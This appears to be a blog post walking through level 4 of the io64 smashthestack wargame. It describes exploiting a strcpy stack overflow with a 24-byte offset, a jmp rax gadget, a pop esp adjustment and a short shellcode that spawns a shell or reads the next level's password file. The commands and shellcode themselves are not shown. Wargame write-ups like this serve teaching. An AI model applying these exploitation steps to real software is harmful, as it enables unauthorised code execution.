[io64][smashthestack] level4: stack smashing… at last !

in this level, we’re finally going to exploit the binary:

as you can see no bound checking is done at all on argv[1], a long string would cause the return address of the dobug function to be overwritten.

let’s try it and see what happens on the stack, first right before the call to strcpy:

Now that we’ve located the return address, let’s see what happens after the call to strcpy, notice the return address at 0x7ffcfc605868, and the buffer address is stored in rax and rdi (0x7ffcfc605850), this means we only need to insert 24 bytes of “A” before overwriting the return address.

As expected, the  return address is overwritten, but now we need to figure out which address to store there. We can’t just provide the address of the stack buffer as ASLR is enabled.

Let’s see what registers changed, and what register didn’t:

Good news, rax and rdi did not change ! We could look for some gadgets in order to jump to rax or rdi. Radare2 provides a command for that 🙂

Perfect ! we found some code which jumps directly to rax at 0x00600477

This will be the value we’ll overwrite the return address with.

Now all we need to do is write a 24bytes sized shellcode in order to get a shell or just dump the /home/level5/.pass file.

But first let’s test our JOP:

Neat ! but there still is one potential problem, our shell code could be overwritten by a push we need to find a way to change esp in a location far from our shellcode but without costing too much, let’s look at our registers and at the stack

Luckily enough the stack contains an address far from our shellcode, a simple pop esp (0x5c, only one byte !!) will do the trick.

Now we need  23bytes shell code… found one here

Let’s try it:

Almost too easy 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *